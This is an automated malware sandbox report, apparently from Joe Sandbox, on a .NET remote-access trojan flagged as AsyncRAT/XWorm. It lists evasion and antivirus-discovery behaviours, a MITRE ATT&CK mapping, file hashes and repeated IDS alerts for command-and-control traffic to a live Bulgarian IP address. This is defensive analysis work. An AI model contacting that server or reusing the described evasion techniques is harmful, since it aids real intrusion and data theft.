Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Process information queried: ProcessInformation

            Anti Debugging

Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Process Stats: CPU usage > 42% for more than 60s
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Process token adjusted: Debug
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Queries volume information: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe VolumeInformation
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, 00000000.00000002.3784605807.000000001B6EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

Source: Yara match | File source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe PID: 7776, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe PID: 7776, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques are listed per tactic column. A number in parentheses is the count of report signatures mapped to that technique; entries without a number are the matrix's template cells and were not triggered by this sample.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation (11); Scheduled Task/Job; At; Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Disable or Modify Tools (1); Virtualization/Sandbox Evasion (232); Deobfuscate/Decode Files or Information (1); Software Packing (2); DLL Side-Loading (1)
Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (232); Application Window Discovery (1); System Information Discovery (13)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Input Capture (1); Archive Collected Data (11); Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Application Layer Protocol (1); Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

            SourceDetectionScannerLabelLink
            17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
            17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe100%AviraTR/Spy.Gen
            17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
87.120.116.179 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
87.120.116.179 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, 00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
87.120.116.179 | unknown | Bulgaria | 25206 | UNACS-AS-BG8000BurgasBG | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1586002
                Start date and time:2025-01-08 16:00:03 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 14s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 5
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.109.210.53
                • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                • VT rate limit hit for: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
Time | Type | Description
10:01:00 | API Interceptor | 14350544x Sleep call for process: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe modified
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):5.607994918660752
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            • Win32 Executable (generic) a (10002005/4) 49.75%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
                            File size:36'864 bytes
                            MD5:5ab0db61a062d4ac36716b51c5ddac3a
                            SHA1:ad625cd275fafd23bbfbcf81a187031724bdef02
                            SHA256:929781941202c78878fbbf8e872f8559cdbd074c4e37f9dfcc8164422fbf9ddc
                            SHA512:9d3ece3454121801d05d67563405dc9a92d32d8e3b75e82829bc13a1de4d3b4ad8afc258de56090729361b2e6ee17b36a73ec67e6d96b5692d8db71fc72bb60b
                            SSDEEP:768:LL13A5Uno9RfHWa2BbUeo8icH1bxbFb9EsOMhzQXvjp:PxA5Uno9JHWXAeNicH1bBFb9EsOM16jp
                            TLSH:FBF24B48BBA04217D9ED6BF5A97372020674D613D917EB4E4CD48ADB6F27BC08D013EA
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,n~g................................. ........@.. ....................................@................................
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x40a5de
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x677E6E2C [Wed Jan 8 12:23:08 2025 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa58c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x4c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x85e4 | 0x8600 | 90a7123ee3386d8c6ce9e90f124574aa | False | 0.4988339552238806 | data | 5.745280910175581 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x4c8 | 0x600 | b467910afb739ea2a2cc0ff880f6cac4 | False | 0.3723958333333333 | data | 3.679474816939037 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 0a3a083968c42d8366b2de0e8564a094 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x234 | data | | | 0.4734042553191489
RT_MANIFEST | 0xc2d8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP:Port | Dest IP:Port | Protocol
2025-01-08T16:01:12.903932+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:01:13.077801+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:01:13.127851+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:01:16.242604+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:01:16.242604+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:01:24.618805+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:01:24.620770+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:01:36.166777+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:01:36.170007+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:01:46.243779+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:01:46.243779+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:01:47.713242+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:01:47.714831+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:01:59.244040+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:01:59.246666+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:09.782194+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:09.784371+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:10.353231+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:10.362630+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:13.370500+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:13.374062+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:15.489399+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:15.497763+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:16.258225+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:16.258225+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:17.034068+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:17.035854+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:28.556337+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:28.557879+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:34.587963+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:34.590606+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:36.254498+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:36.258427+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:42.464649+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:42.466617+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:44.616880+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:44.860550+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:44.862387+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:44.908106+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:44.909886+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:44.955792+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:44.957595+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:45.050926+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:45.052851+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:45.375712+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:45.382678+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:02:46.232947+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:46.232947+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:54.884571+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:02:54.888266+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:03.197868+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:03.199865+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:03.293292+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:03.295087+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:13.388453+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:13.395074+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:15.841576+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:15.845023+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:16.234270+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:16.234270+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:18.732296+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:18.750360+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:30.215641+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:30.297465+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:31.244627+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:31.246525+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:31.333076+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:31.334683+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:31.441862+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:31.446747+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:42.863753+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:42.865670+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:43.908475+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:43.910630+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:46.241774+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:46.241774+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:51.681589+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:51.683612+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:03:51.770206+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:03:51.771932+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:04:02.015912+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:02.018831+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
